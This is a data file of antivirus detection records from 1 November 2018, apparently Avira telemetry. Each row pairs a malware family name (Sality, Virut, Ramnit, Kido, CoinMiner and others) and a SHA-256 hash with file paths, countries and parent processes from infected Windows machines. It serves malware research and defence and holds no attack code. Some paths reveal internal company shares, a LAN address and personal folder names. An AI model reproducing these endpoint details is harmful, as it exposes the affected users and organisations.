  Row(detection=Row(filename='sndvol.exe', filepath='F:\\Windows\\System32\\SndVol.exe', filesize=768000, name='W32/Sality.AG.#M1.#R1'), hash='45d8128215ca763012aca9d3755bfd493a70592c95257debe73190393c1883c1', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T12:24:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='enviar malote feit o em 11 06 .scr', filepath='C:\\Users\\X\\Desktop\\enviar malote feit o em 11 06 .scr', filesize=320000, name='WORM/Nenebra.A.#M1.#R1'), hash='53a514f013d76540f5daf64de34a640b8a214a9af019a5c257fd562ca7d50ee5', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T16:46:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='corrective action.bat', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\sharing\\DINI\\RPG\\AUDIT\\Suggestion Corrective Action\\Corrective Action.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:26:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155953-e8f7f5ff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155953-E8F7F5FF', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:59:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='aidl.exe', filepath='F:\\MI files\\MiPhone_MiFlash\\Note 3 mtk\\XIAOMI_REDMI_NOTE_3_MT6795_Tools_IMEI_REPAIR\\Mediatek_MT6795_Tools_IMEI\\Android\\aidl.exe', filesize=1472000, name='W32/Sality.AT.#M1.#R1'), hash='053997ec1594f9dda48c0ccfdc74fcd9495847ed5dcd5406d8c0600796324dce', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe', parentsize=1426264, timestamp='2018-11-01T10:33:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T10:24:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sndvol.exe', filepath='F:\\Windows\\System32\\SndVol.exe', filesize=768000, name='W32/Sality.AG.#M1.#R1'), hash='45d8128215ca763012aca9d3755bfd493a70592c95257debe73190393c1883c1', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T14:47:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155852-debdf551', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155852-DEBDF551', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:58:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='005-[s] - mild [new single].exe', filepath='E:\\music\\music\\Vampires 652 P\\005-[S] - MILD [New Single]\\005-[S] - MILD [New Single].exe', filesize=1088000, name='W32/Virut.Gen.#M1.#R1'), hash='336cbdd63ca1e571ea773fc79cafad47042ecf28c82a96a452a5d0c3a4ad5b2c', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:13:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='redist.exe', filepath='D:\\DATA_SHARE\\program\\unused\\APR_15\\ERP\\System32\\Redist\\Redist.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:29:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-01T16:08:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='oktober.scr', filepath='D:\\DATA_SHARE\\audit\\2016\\oktober\\oktober.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:21:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T02:42:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='back fifa.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\New Folder\\CINTIA\\LPA GAJI\\CASH BACK FIFA\\BACK FIFA.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:24:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154537-58d36195', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154537-58D36195', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:45:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwh316f', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWH316F', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:43:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='lgmupgradedl.dll', filepath='E:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.442\\FlashTool.1.0.54英文版\\KDZ_FW_UPD_EN\\LGMUpgradeDL.dll', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='0c7547ae531a11e8de775fe1da665dd4ad4ed666bafc949ba1a2c417568518d0', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:36:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwh39db', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWH39DB', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:32:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-085846-83cf02c7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_63a94eb3\\AVSCAN-20181101-085812-7E2BFCF0\\AVSCAN-20181101-085846-83CF02C7', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:58:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='birforms.exe', filepath='C:\\eBIRForms\\BIRForms.exe', filesize=30912000, name='W32/Sality.AT.#M1.#R1'), hash='1511090e5bb6ca6135675bf11411b7453f8934ab98e89eeab987cee50e479829', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T03:38:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='207144232040455.exe', filepath='\\\\?\\C:\\Temp\\207144232040455.exe', filesize=192000, name='HEUR/AGEN.1031796.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:15:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='start.exe', filepath='\\\\192.168.0.100\\kr-server\\廣羅\\kr-server\\server行政\\0管理部\\行政部\\工商萬用管理表格管理表格\\經營管理類\\start.exe', filesize=1536000, name='W32/Stanit.#M1.#R1'), hash='76a84b3f9652d21a1a93f6578a3fff9714c697e125c87d859e58e40858015ae2', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:dZLJlmOScUes48KI.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T00:57:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='76qn6rort.vir', filepath='\\\\?\\C:\\Program Files\\76QN6RORTL\\76QN6RORT.VIR', filesize=832000, name='TR/Dropper.Gen.#M300.#R4133'), hash='733e354c150b4149737ae67afd29dc8e971759219779881f1f0375c6118fb5b9', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T09:48:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pmc01015.exe', filepath='C:\\NOVA PASTA\\PVECF21\\BKPROG\\PMC01015.exe', filesize=8192000, name='W32/Sality.AT.#M1.#R1'), hash='8b41cda8d6482a0e2aca27f0fb0b07af12ca04d6688365f245de7ca2da27aec4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:39:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-112139-4b62ea45', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-112139-4B62EA45', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:21:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered maret', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered maret', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='d10b64f3d6d9307bbc0c72f71da97d688d13752bb597a30c0fff8fd1a3dfd5cd', metadata=Row(cmdline='{EF0985A2-4C50-4BCC-AB09-7CFEE95E0C65} S-1-5-21-2376277972-633460711-2922603215-1000:Ich-PC\\\\\\\\Ich:Interactive:Highest[1]', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\taskeng.exe', parentsize=192000, timestamp='2018-11-01T01:24:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cache.exe', filepath='G:\\UniversalImageLoader\\Cache.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='e9238eb4cc2a0e45a4ecca77c7477cc3a19b6954cc0ca545537f1325ece125fc', metadata=Row(cmdline=None, country='CI', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\explorer.exe', parentsize=2106176, timestamp='2018-11-01T11:50:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\VFP98\\DISTRIB.SRC\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='ba1c1ec10f7445b80823c5e7eda2842be32aa364630bc4aa3495259d5b04f012', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:47:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111522-1be88053', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111522-1BE88053', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:15:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fiwllc.exe', filepath='C:\\Windows\\System32\\fiwllc.exe', filesize=576000, name='HEUR/AGEN.1024618.#M1.#R1'), hash='df51caf4f72b8e4fad3e5afa11d40330cb554b5f6d67544891976283798597e3', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T14:15:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered lacid', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lacid', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a70a3042b79fab309d8c4c27918d2264c8f48d6169355e45c8fbd8c074c3329a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T01:52:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-000829-e4395641', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8a693d56\\AVSCAN-20181101-000803-D50C3FD5\\AVSCAN-20181101-000829-E4395641', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T06:08:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-161551-eeabcc84', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2cd1ddcd\\AVSCAN-20181101-161148-D5525E98\\AVSCAN-20181101-161551-EEABCC84', filesize=1664000, name='TR/ATRAPS.Gen4.#M1.#R1'), hash='7d5d2c613b9756c34903403e6e5c0f01efc402e1472ca198eb0a7534c354ead1', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:15:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='C:\\Windows\\Temp\\nsz83F0.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=19467544, timestamp='2018-11-01T22:14:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111024-f65535f9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111024-F65535F9', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:10:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dsp3.exe', filepath='F:\\大戰略 PERFECT 3.0\\DSP3.EXE', filesize=2048000, name='W32/Almanahe.C.#M1.#R1'), hash='6d72a116be57c06d272d643fa65661a8173d7c515d29436351b7a9b331c722ed', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:MiIC1l\\\\\\/jbEyNM8o0.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T20:34:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094309-8e41de11', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d45ade37\\AVSCAN-20181101-094239-89A6D73E\\AVSCAN-20181101-094309-8E41DE11', filesize=4928000, name='TR/Agent.ugljo.#M1.#R1'), hash='6d7b13673e4f0f9804f2f521f9070816d5cccc266b8dc427137433935cfe2f27', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T12:43:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tcls_core.exe', filepath='C:\\Program Files\\WeGame\\tcls\\tcls_core.exe', filesize=1124000, name='W32/Sality.AT.#M1.#R1'), hash='9ecc70cccfac22c196ba9658a9971ee4534aa55e5854527c4a81b5baa17b9762', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:N43mJjH1K0qGY1MH.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T14:17:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-161452-b3344b69', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_484b0544\\AVSCAN-20181101-161421-ADC8F46B\\AVSCAN-20181101-161452-B3344B69', filesize=1088000, name='TR/Strictor.ca41b9.#M1.#R1'), hash='ca41b9db04c6227da715eb34d3bb5e92205ebc187e009ce0e1db2c944efce400', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:14:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='773c8ff8e05e3ff7c217206f9b70373be0f33b0e2847dddb60dd659c00e54d87', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-5\\773C8FF8E05E3FF7C217206F9B70373BE0F33B0E2847DDDB60DD659C00E54D87', filesize=1344000, name='TR/Crypt.FKM.Gen.#M300.#R581'), hash='773c8ff8e05e3ff7c217206f9b70373be0f33b0e2847dddb60dd659c00e54d87', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:56:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maxiget.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\TMP\\MaxiGet.exe', filesize=636000, name='TR/Agent.636000.#M1.#R1'), hash='842272f756ee756fac0ae3d2ff9fcad19b6891feaa61e8ddd0f09f2156c403c4', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T20:29:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-215509-2f1e8363', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c4e693d0\\AVSCAN-20181101-215241-1C39608E\\AVSCAN-20181101-215509-2F1E8363', filesize=788000, name='PUA/DNSBlock.#M1.#R1'), hash='6fed83ce7f539d48185dc7329823f199c509f9c04401cdfb82b83140f4bf74f6', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:55:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='zbuoc.dll', filepath='C:\\WINDOWS\\system32\\zbuoc.dll', filesize=164000, name='WORM/Kido.ih.13.#M1.#R1'), hash='90d555ee3df33bc5ee2139af99567c0c694f11ffc007ef87250e4beabb6c6f1b', metadata=Row(cmdline=None, country='BA', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:06:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp000b43e1', filepath='C:\\Windows\\Temp\\tmp00000296\\tmp000b43e1', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T10:55:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T10:34:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-001240-e7ab4c3b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28e34e72\\AVSCAN-20181101-234504-1DD013D9\\AVSCAN-20181102-001240-E7AB4C3B', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:15:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='jet40sp5_9xnt.exe', filepath='D:\\Scan\\wulan1\\BACKUP\\BMD Street\\hysys 7.3\\aspenONEV7.3dvd1\\administration\\AFW\\afwv73\\core\\mdac27sp1\\Jet40SP5_9xNT.exe', filesize=2752000, name='W32/Virut.Gen.#M1.#R1'), hash='0c78da3d90f2b7b5976846aaa31136a601a9f378a646284a2db245abce5e346f', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:24:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-235152-fa9575c7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_83a270a8\\AVSCAN-20181101-234858-E1580469\\AVSCAN-20181101-235152-FA9575C7', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:51:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T14:50:49Z'), dt=datetime.date(2018, 11, 1)),
